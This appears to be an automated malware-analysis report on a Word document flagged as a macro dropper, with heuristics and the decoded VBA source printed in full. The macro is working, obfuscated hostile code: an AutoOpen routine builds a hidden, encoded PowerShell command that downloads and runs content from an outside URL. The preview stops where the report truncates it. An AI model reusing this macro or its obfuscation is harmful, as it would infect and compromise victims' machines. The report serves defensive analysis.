Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that uses the Shell() command. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6444900-0' further supports its role as a dropper. The macro's obfuscated string concatenation suggests a deliberate effort to hide the payload's origin or nature.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6444900-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6444900-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7100 bytes | 353c4eb8338a9d5e2abb823cf6cd8c297c59b5e8838fb5a34cd5d51963a92c34 |
Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Tracking"
Sub AutoOpen()
Dim IO_LB As String
JL_NB = Array("-", "e", "i", "c", "y", "b", "a", "s", " ", "w", "p", "d", "l", "h", "r", "x", "o", "n", "u", "t")
Dim GS_TF As String
GS_TF = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
Dim ER_TE As String
ER_TE = "QAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAe"
IO_LB = IO_LB + JL_NB(10)
IO_LB = IO_LB + JL_NB(16)
Dim FT_LA As String
FT_LA = "QBzAHQAZQB"
Dim DM_MI As String
DM_MI = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABp"
IO_LB = IO_LB + JL_NB(9)
IO_LB = IO_LB + JL_NB(1)
Dim GO_SE As String
GO_SE = "AG4AZwBdADoAOgBVAFQARgA4AC4ARwBl"
GN_QI = GN_QI & GS_TF & ER_TE & FT_LA & DM_MI & GO_SE
Dim IT_NB As String
IT_NB = "AHQAUwB0AHIAaQBuAGcAKABbAFMAeQ"
IO_LB = IO_LB + JL_NB(14)
IO_LB = IO_LB + JL_NB(7)
Dim BO_MG As String
BO_MG = "BzAHQAZQBtAC4AQwBvAG4AdgBlAHIAd"
Dim IQ_LC As String
IQ_LC = "ABdADoA"
IO_LB = IO_LB + JL_NB(13)
IO_LB = IO_LB + JL_NB(1)
Dim IL_TH As String
IL_TH = "OgBGAHIAbwBtAEIAYQBzAGUANgA0AFM"
Dim BO_PC As String
BO_PC = "AdAByAGkAbgB"
GN_QI = GN_QI & IT_NB & BO_MG & IQ_LC & IL_TH & BO_PC
IO_LB = IO_LB + JL_NB(12)
IO_LB = IO_LB + JL_NB(12)
Dim GM_PJ As String
GM_PJ = "nACgAJAB4ACkAKQB9A"
Dim HQ_PI As String
HQ_PI = "DsAaQBlAHgAIAAkACgAYQ"
IO_LB = IO_LB + JL_NB(8)
IO_LB = IO_LB + JL_NB(0)
Dim DT_SE As String
DT_SE = "AgACQAK"
Dim DP_LG As String
DP_LG = "AAkACgAJAAoAGkAb"
IO_LB = IO_LB + JL_NB(9)
IO_LB = IO_LB + JL_NB(2)
Dim CM_LG As String
CM_LG = "gB2AG8A"
GN_QI = GN_QI & GM_PJ & HQ_PI & DT_SE & DP_LG & CM_LG
Dim BN_NJ As String
BN_NJ = "awBlAC0AdwBlAGIA"
IO_LB = IO_LB + JL_NB(17)
IO_LB = IO_LB + JL_NB(11)
Dim CN_OF As String
CN_OF = "cgBlAHEAdQBlA"
Dim GP_SC As String
GP_SC = "HMAdAAgACcAaAB0AHQAcABzADoALw"
IO_LB = IO_LB + JL_NB(16)
IO_LB = IO_LB + JL_NB(9)
Dim HM_SJ As String
HM_SJ = "AvAHUAcwB"
Dim FL_LG As String
FL_LG = "wAHIAZAA1A"
GN_QI = GN_QI & BN_NJ & CN_OF & GP_SC & HM_SJ & FL_LG
IO_LB = IO_LB + JL_NB(7)
IO_LB = IO_LB + JL_NB(19)
Dim BR_QC As String
BR_QC = "DEANQAwAGMAZQB"
Dim FM_TE As String
FM_TE = "uAHQAcgBhAGwALgB0AGEAYgB"
IO_LB = IO_LB + JL_NB(4)
IO_LB = IO_LB + JL_NB(12)
Dim FT_NH As String
FT_NH = "sAGUALg"
Dim DS_SJ As String
DS_SJ = "BjAG8AcgBlAC4AdwBpAG4AZABvAHcAcw"
IO_LB = IO_LB + JL_NB(1)
IO_LB = IO_LB + JL_NB(8)
Dim BS_SH As String
BS_SH = "AuAG4AZQB0A"
GN_QI = GN_QI & BR_QC & FM_TE & FT_NH & DS_SJ & BS_SH
Dim CQ_LI As String
CQ_LI = "C8AdwBhAHIAZQBoAG8Ad"
IO_LB = IO_LB + JL_NB(13)
IO_LB = IO_LB + JL_NB(2)
Dim DL_PC As String
DL_PC = "QBzAGUAPwAkAGYAaQBsAHQ"
Dim HT_TF As String
HT_TF = "AZQByAD0AUABhAHIAdABpAHQAaQBvAG4"
IO_LB = IO_LB + JL_NB(11)
IO_LB = IO_LB + JL_NB(11)
Dim DL_SD As String
DL_SD = "ASwBlAHkAJQAyADAA"
Dim JO_NC As String
JO_NC = "ZQBxACUAMgAwACUAMgA3AHMAd"
GN_QI = GN_QI & CQ_LI & DL_PC & HT_TF & DL_SD & JO_NC
IO_LB = IO_LB + JL_NB(1)
IO_LB = IO_LB + JL_NB(17)
Dim FL_RH As String
FL_RH = "ABhAGcA"
Dim BP_PF As String
BP_PF = "ZQAlADIANwAmACQAUwBlAGwA"
IO_LB = IO_LB + JL_NB(8)
IO_LB = IO_LB + JL_NB(0)
Dim DK_TD As String
DK_TD = "ZQBjAHQAPQBkAGEAdA"
Dim FT_OC As String
FT_OC = "BhACYAcwB2AD0AMgAwADEANwAtADAAN"
IO_LB = IO_LB + JL_NB(1)
IO_LB = IO_LB + JL_NB(15)
Dim IT_SD As String
IT_SD = "AAtADEANwAmAHMAcwA9A"
GN_QI = GN_QI & FL_RH & BP_PF & DK_TD & FT_OC & IT_SD
Dim AM_OH As String
AM_O
```
... (truncated)